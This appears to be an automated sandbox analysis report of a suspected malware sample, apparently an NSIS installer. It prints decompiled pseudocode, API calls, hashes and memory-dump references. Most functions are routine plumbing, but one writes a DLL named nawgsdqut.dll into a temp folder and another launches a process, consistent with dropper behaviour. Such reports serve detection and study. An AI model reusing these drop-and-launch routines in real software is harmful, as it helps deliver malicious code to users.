                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 1646373207-1276376045
                                                  • Opcode ID: a51deca0231a8a5f760e61e4e1b1b27d930e4b2956413d84b74e75738505fedd
                                                  • Instruction ID: 2286c89ec3fb19e5413f2f4f9077ee0166f05cb1f326face708f64fece25f378
                                                  • Opcode Fuzzy Hash: a51deca0231a8a5f760e61e4e1b1b27d930e4b2956413d84b74e75738505fedd
                                                  • Instruction Fuzzy Hash: 89D0177060420CBBEF41DFA1DC85BAA7BACEB05681F014164F948E5061EB32DB609768
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                  0x0040568c
                                                  0x004056a3
                                                  0x004056ab
                                                  0x004056ab
                                                  0x004056b3

                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 0040569A
                                                  • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3936084776
                                                  • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                  • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                                  • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                  • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000E2EE, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E1000E2EE(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000A940(_t50,  &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000E12D( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E1000985A(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                                  0x1000e2f6
                                                  0x1000e2fb
                                                  0x1000e315
                                                  0x00000000
                                                  0x1000e315
                                                  0x1000e2fd
                                                  0x1000e302
                                                  0x00000000
                                                  0x00000000
                                                  0x1000e307
                                                  0x1000e324
                                                  0x1000e329
                                                  0x1000e32c
                                                  0x1000e333
                                                  0x1000e352
                                                  0x1000e359
                                                  0x1000e35b
                                                  0x1000e39f
                                                  0x1000e3ae
                                                  0x1000e3bc
                                                  0x1000e3be
                                                  0x1000e3ce
                                                  0x1000e3ce
                                                  0x1000e3d2
                                                  0x1000e3d4
                                                  0x1000e3d7
                                                  0x1000e3d7
                                                  0x1000e3d7
                                                  0x1000e3d7
                                                  0x00000000
                                                  0x1000e3dd
                                                  0x1000e3c0
                                                  0x1000e3c0
                                                  0x1000e3c5
                                                  0x1000e3c5
                                                  0x1000e3c8
                                                  0x00000000
                                                  0x1000e3c8
                                                  0x1000e35d
                                                  0x1000e360
                                                  0x1000e364
                                                  0x1000e38d
                                                  0x1000e38d
                                                  0x1000e390
                                                  0x1000e390
                                                  0x00000000
                                                  0x00000000
                                                  0x1000e392
                                                  0x1000e396
                                                  0x00000000
                                                  0x00000000
                                                  0x1000e398
                                                  0x1000e398
                                                  0x00000000
                                                  0x1000e398
                                                  0x1000e366
                                                  0x1000e369
                                                  0x00000000
                                                  0x00000000
                                                  0x1000e36d
                                                  0x1000e380
                                                  0x1000e386
                                                  0x1000e389
                                                  0x1000e38b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x1000e38b
                                                  0x1000e335
                                                  0x1000e338
                                                  0x1000e33a
                                                  0x1000e33f
                                                  0x1000e33f
                                                  0x1000e344
                                                  0x00000000
                                                  0x1000e344
                                                  0x1000e309
                                                  0x1000e30e
                                                  0x1000e312
                                                  0x1000e312
                                                  0x00000000

                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E324
                                                  • __isleadbyte_l.LIBCMT ref: 1000E352
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E380
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E3B6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 7c7cdd43fd9fceb98677bf0eadf8cde8e08c2bba18dc8e71bfa7b984b154a3d1
                                                  • Instruction ID: 2a33c8207b62c249b69d9822ebd055890102a54cd2658082b7bea86fa34f5453
                                                  • Opcode Fuzzy Hash: 7c7cdd43fd9fceb98677bf0eadf8cde8e08c2bba18dc8e71bfa7b984b154a3d1
                                                  • Instruction Fuzzy Hash: 91319C31600296AFEB11CF25CC48AAE7FE5EF41390F164569F864A7194E730EE50DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1001067B, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E1001067B(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10010A04(_a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					if(_t25 != 0x66) {
						if(_t25 == 0x61 || _t25 == 0x41) {
							_t26 = E10010AD2(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							_t26 = E10010FDB(__edx, __esi, _a4, _a8, _a12, _a20, _a24, _a28);
						}
						L9:
						return _t26;
					} else {
						return E10010F1A(__edx, __esi, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                  0x1001067e
                                                  0x10010684
                                                  0x100106f7
                                                  0x00000000
                                                  0x1001068b
                                                  0x1001068e
                                                  0x100106ac
                                                  0x100106de
                                                  0x100106b3
                                                  0x100106c5
                                                  0x100106c5
                                                  0x100106fc
                                                  0x10010700
                                                  0x10010690
                                                  0x100106a8
                                                  0x100106a8
                                                  0x1001068e

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                  • Instruction ID: 3a04b82b66f1936f3775f1dbf84fef5388787c8f238b76ee7b0f6dae778f1168
                                                  • Opcode Fuzzy Hash: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                  • Instruction Fuzzy Hash: 57018C7650018EBBCF12DE80CC028EE3F62FF48294B548415FEA859031D6B6D9B1AB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                  0x00401d46
                                                  0x00401d5f
                                                  0x00401d69
                                                  0x00401d6e
                                                  0x00401d79
                                                  0x00401d80
                                                  0x00401d92
                                                  0x00401d98
                                                  0x00401d9d
                                                  0x00401da7
                                                  0x004024eb
                                                  0x00401561
                                                  0x00402866
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D3F
                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                  • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirect
                                                  • String ID:
                                                  • API String ID: 3272661963-0
                                                  • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                  • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                                  • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                  • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                                                  0x00402bf8
                                                  0x00402c12
                                                  0x00402c18
                                                  0x00402c22
                                                  0x00402c28
                                                  0x00402c2e
                                                  0x00402c3f
                                                  0x00402c48
                                                  0x00000000
                                                  0x00402c4d
                                                  0x00402c54
                                                  0x00402c1a
                                                  0x00402c21
                                                  0x00402c21
                                                  0x00402bfa
                                                  0x00402bfa
                                                  0x00402c01
                                                  0x00402c04
                                                  0x00402c04
                                                  0x00402c0a
                                                  0x00402c11
                                                  0x00402c11

                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                  • GetTickCount.KERNEL32 ref: 00402C22
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                  • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                                  • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                  • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                                                  0x00404de0
                                                  0x00404e05
                                                  0x00404e25
                                                  0x00404e28
                                                  0x00404e2b
                                                  0x00404e42
                                                  0x00404e48
                                                  0x00404e4f
                                                  0x00404e56
                                                  0x00404e5d
                                                  0x00404e62
                                                  0x00404e68
                                                  0x00000000
                                                  0x00404e78
                                                  0x00404e12
                                                  0x00404e65
                                                  0x00404e65
                                                  0x00000000
                                                  0x00404e65
                                                  0x00404e1e
                                                  0x00404e20
                                                  0x00000000
                                                  0x00404e20
                                                  0x00404de6
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ded
                                                  0x00000000

                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00404E0A
                                                  • CallWindowProcA.USER32 ref: 00404E78
                                                    • Part of subcall function 00403EA0: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                  • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                                  • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                  • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                  0x004024f1
                                                  0x004024f1
                                                  0x004024f4
                                                  0x0040250f
                                                  0x004024f6
                                                  0x004024f8
                                                  0x004024fd
                                                  0x00402504
                                                  0x00402516
                                                  0x0040268f
                                                  0x0040268f
                                                  0x0040251c
                                                  0x0040252e
                                                  0x004015a6
                                                  0x004015a8
                                                  0x00000000
                                                  0x004015ae
                                                  0x004015a8
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll, xrefs: 004024FD, 00402522
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileWritelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll
                                                  • API String ID: 427699356-3858581448
                                                  • Opcode ID: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                                  • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                                                  • Opcode Fuzzy Hash: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                                  • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                  0x00405401
                                                  0x0040541d
                                                  0x00405425
                                                  0x0040542a
                                                  0x00000000
                                                  0x00405430
                                                  0x00405434

                                                  APIs
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                                  • CloseHandle.KERNEL32(?), ref: 0040542A
                                                  Strings
                                                  • Error launching installer, xrefs: 0040540B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                  • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                                  • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                  • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                                                  0x00403557
                                                  0x0040355f
                                                  0x00403566
                                                  0x00403569
                                                  0x00403569
                                                  0x0040356b
                                                  0x00403570
                                                  0x00403577
                                                  0x0040357d
                                                  0x00403581
                                                  0x00403582
                                                  0x0040358a

                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                                  • GlobalFree.KERNEL32 ref: 00403577
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3936084776
                                                  • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                  • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                                  • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                  • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                  0x004056d3
                                                  0x004056dd
                                                  0x004056df
                                                  0x004056e6
                                                  0x004056ee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004056ee
                                                  0x004056f0
                                                  0x004056f5

                                                  APIs
